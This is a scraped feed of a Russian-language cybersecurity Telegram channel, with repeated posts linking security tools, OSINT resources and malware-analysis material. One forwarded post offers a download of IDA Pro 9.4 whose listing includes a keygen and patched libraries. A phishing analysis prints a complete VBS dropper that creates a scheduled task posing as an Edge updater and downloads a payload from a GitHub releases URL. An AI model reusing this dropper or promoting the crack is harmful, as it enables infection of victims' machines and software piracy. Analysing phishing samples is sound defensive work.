ShadowLab — это образовательный фреймворк командования и управления (C2), разработанный исключительно для исследований в области кибербезопасности, авторизованных оценок безопасности.
Вместо того чтобы служить набором инструментов для атак, проект демонстрирует, как современные инфраструктуры C2 проектируются с помощью прозрачных реализаций зашифрованной связи, генерации полезной нагрузки, внутренних механизмов Windows и модульных рабочих процессов пост-эксплуатации.
Репозиторий : https://github.com/msalihberk/ShadowLab
Вместо того чтобы служить набором инструментов для атак, проект демонстрирует, как современные инфраструктуры C2 проектируются с помощью прозрачных реализаций зашифрованной связи, генерации полезной нагрузки, внутренних механизмов Windows и модульных рабочих процессов пост-эксплуатации.
Репозиторий : https://github.com/msalihberk/ShadowLab
❤6
Obsidian Encrypt — шифрование заметок прямо внутри Obsidian
Obsidian хранит данные в обычных Markdown-файлах, поэтому важные записи могут оказаться открытыми при утечке vault.
Плагин Obsidian Encrypt позволяет:
• шифровать отдельные заметки;
• скрывать чувствительные блоки текста;
• защищать API-ключи, приватные данные и исследовательские записи;
• хранить расшифрованные данные только в памяти.
Полезно для тех, кто использует Obsidian как базу знаний для разработки, OSINT, пентеста или исследований.
Репозиторий: https://github.com/meld-cp/obsidian-encrypt
Obsidian хранит данные в обычных Markdown-файлах, поэтому важные записи могут оказаться открытыми при утечке vault.
Плагин Obsidian Encrypt позволяет:
• шифровать отдельные заметки;
• скрывать чувствительные блоки текста;
• защищать API-ключи, приватные данные и исследовательские записи;
• хранить расшифрованные данные только в памяти.
Полезно для тех, кто использует Obsidian как базу знаний для разработки, OSINT, пентеста или исследований.
Репозиторий: https://github.com/meld-cp/obsidian-encrypt
❤5
Decepticon — AI-агент для автономного пентеста
Open-source платформа, объединяющая несколько специализированных AI-агентов для проведения разведки, поиска уязвимостей, эксплуатации и постэксплуатации.
Проект использует LangGraph, Neo4j и Docker-окружение с Kali Linux, позволяя автоматизировать сложные сценарии Red Team.
Пока такие системы не заменяют специалистов, но уже показывают, в каком направлении развивается offensive security.
GitHub: https://github.com/PurpleAILAB/Decepticon
Open-source платформа, объединяющая несколько специализированных AI-агентов для проведения разведки, поиска уязвимостей, эксплуатации и постэксплуатации.
Проект использует LangGraph, Neo4j и Docker-окружение с Kali Linux, позволяя автоматизировать сложные сценарии Red Team.
Пока такие системы не заменяют специалистов, но уже показывают, в каком направлении развивается offensive security.
GitHub: https://github.com/PurpleAILAB/Decepticon
❤5
Cybersec.pdf
100.9 KB
Как работает цифровая криминалистика в USA и Европе.
Какие инструменты используются от анализа трафика до мобильных устройств.
Какие инструменты используются от анализа трафика до мобильных устройств.
❤6
Reverse Engineering & Malware-Analysis Resources
Это, пожалуй, один из лучших репозиториев по:
Reverse Engineering;
Malware Analysis;
Binary Exploitation;
Firmware;
Frida;
Ghidra;
IDA;
Binary Ninja;
eBPF;
ARM.
Это не просто список ссылок, а огромная база инструментов и материалов.
Репозиторий
Это, пожалуй, один из лучших репозиториев по:
Reverse Engineering;
Malware Analysis;
Binary Exploitation;
Firmware;
Frida;
Ghidra;
IDA;
Binary Ninja;
eBPF;
ARM.
Это не просто список ссылок, а огромная база инструментов и материалов.
Репозиторий
Forwarded from Proxy Bar
IDA pro 9.4
*
Linux + Windows + Mac + ARM
download
*
*
Linux + Windows + Mac + ARM
download
*
tree "/home/data/0x01/IDA/IDA pro 9.4/"
/home/reeves/data/soft/IDA/IDA pro 9.4/
├── ida-pro_94_armlinux.run
├── ida-pro_94_armmac.app.zip
├── ida-pro_94_armwin.exe
├── ida-pro_94_x64linux.run
├── ida-pro_94_x64mac.app.zip
├── ida-pro_94_x64win.exe
├── kg_patch
│ ├── idapro.hexlic
│ ├── keygen.js
│ ├── README
│ ├── x64linux
│ │ ├── libida32.so
│ │ └── libida.so
│ └── x64win
│ ├── ida32.dll
│ └── ida.dll
└── misc
├── hexlicsrv94_x64linux.run
├── hexvault94_x64linux.run
├── idapin94.zip
└── lumina94_x64linux.run
5 directories, 17 files
❤9
Interesting RAT delivered via phishing today
The VBS uses heavy string obfuscation before executing a hidden
- Creates a scheduled task for persistence (every 9 minutes)
- Multi thread cause I am not blueticked 🥳
- Cleaned up VBS screenshot for TLDR
- Downloads
- Saves it as
Something tells me it's not Microsoft 🤣
https://github.com/microsoft-services/
Full code:
Use it for educational purpose only
The VBS uses heavy string obfuscation before executing a hidden
cmd.exe that- Creates a scheduled task for persistence (every 9 minutes)
- Multi thread cause I am not blueticked 🥳
- Cleaned up VBS screenshot for TLDR
- Downloads
GoogleSpace.dat from a GitHub Releases URL- Saves it as
%PUBLIC%\Music\GoogleServices.vbs • Masquerades using a MicrosoftEdgeUpdateTaskMachineCore{GUID} task nameSomething tells me it's not Microsoft 🤣
https://github.com/microsoft-services/
Full code:
Dim shell
Dim command
Set shell = CreateObject("WScript.Shell")
command = "cmd /C " & _
"choice /n /c y /d y /t 30 >nul & " & _
"schtasks /create " & _
" /tn ""MicrosoftEdgeUpdateTaskMachineCore{4CL34008-390A-4893-S0C9-C8B34D3846D8}"" " & _
" /tr ""%PUBLIC%\Music\GoogleServices.vbs"" " & _
" /sc minute /mo 9 /f & " & _
"choice /n /c y /d y /t 30 >nul & " & _
"powershell iwr " & _
"'https://github.com/microsoft-services/staff/releases/download/v0.0.3/GoogleSpace.dat'" & _
" -OutFile ""%env:PUBLIC%\Music\GoogleServices.vbs"" & " & _
"choice /n /c y /d y /t 30 >nul & " & _
"exit"
shell.Run command, 0
Use it for educational purpose only
❤9
Face Search Engines
List of 10 reverse image search engines + Artist Ninja reverse image search.
https://www.faceseek.online/blog/best-face-search-engines
https://artist.ninja/reverse-image-search/
#osint #socmint
List of 10 reverse image search engines + Artist Ninja reverse image search.
https://www.faceseek.online/blog/best-face-search-engines
https://artist.ninja/reverse-image-search/
#osint #socmint
❤5 3👍1
Forwarded from Vaultsec
C2 Traffic Anomaly Detector.pdf
132.7 KB
C2 Traffic Anomaly Detector
Скрипт продавался за 1200$ а на многих «закрытых форумах» и сейчас продается.
- Анализирует PCAP-файлы (дампы трафика).
- Ищет аномальные DNS-запросы (DGA, длинные поддомены, low TTL).
- Обнаруживает
подозрительные TLS сертификаты (самоподписанные, срок < 7 дней, необычные issuer).
- Выявляет регулярные интервалы между пакетами (beaconing).
- Строит граф связей между внутренними IP и внешними хостами.
Скрипт продавался за 1200$ а на многих «закрытых форумах» и сейчас продается.
- Анализирует PCAP-файлы (дампы трафика).
- Ищет аномальные DNS-запросы (DGA, длинные поддомены, low TTL).
- Обнаруживает
подозрительные TLS сертификаты (самоподписанные, срок < 7 дней, необычные issuer).
- Выявляет регулярные интервалы между пакетами (beaconing).
- Строит граф связей между внутренними IP и внешними хостами.
❤6
Forwarded from 🧻 Обходы блокировок YouTube, Discord (ВПН) | Ютуб и Дискорд не работает, ютуб заблокирован замедлили 2026
Репозитории с настоящей малварью. Мы проверили HTTP-коды в тот же день: у чистых проектов 404, у заражённых — 200. И это не пара залётных фейков, а раздачи, которые живут на площадке месяцами и собирают сотни звёзд.
В статье — все проверяемые числа, хэши полезной нагрузки, разбор обоих приёмов сокрытия и готовые команды, которыми ты за минуту проверишь любой репозиторий сам. Плюс отдельно: где предупреждению антивируса стоит верить, а где детект означает лишь «RiskTool» на драйвер WinDivert.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3
Forwarded from 🧻 Обходы блокировок YouTube, Discord (ВПН) | Ютуб и Дискорд не работает, ютуб заблокирован замедлили 2026
🧻 Обходы блокировок YouTube, Discord (ВПН) | Ютуб и Дискорд не работает, ютуб заблокирован замедлили 2026
Продолжение: https://t.me/zapretvirus
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3👍2
Forwarded from C.I.T. Security
Софт, статьи, книги, базы данных и многое другое. Воруем все самое интересное с просторов телеграма и форумов.
🤵Информационные войны и разведка: @cit_psyop
🧑🎓Курсы: @cit_course
🕵️Боты: @citsearch3_bot
@citsearch2bot
🤵Информационные войны и разведка: @cit_psyop
🧑🎓Курсы: @cit_course
🕵️Боты: @citsearch3_bot
@citsearch2bot
❤3
Ghostint Tracker — приложение для веб-расследований и картографии OSINT нового поколения. Чтобы централизовать, визуализировать и обогатить ваши запросы, она объединит динамические графические связи (React Flow), синхронную мировую картографию (React-Leaflet) и искусственный гибрид двойного интеллекта (Locale & Avancee).
https://tracker.prohacking77.me/
https://github.com/jollncoelho/Zhetikal_OSINT_tracker
https://www.youtube.com/watch?v=mQl5btUpOwc
📱 Telegram | 🌐 ВК | 📲 MAX
📲 RUTUBE | 🌍 VK Видео
https://tracker.prohacking77.me/
https://github.com/jollncoelho/Zhetikal_OSINT_tracker
https://www.youtube.com/watch?v=mQl5btUpOwc
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2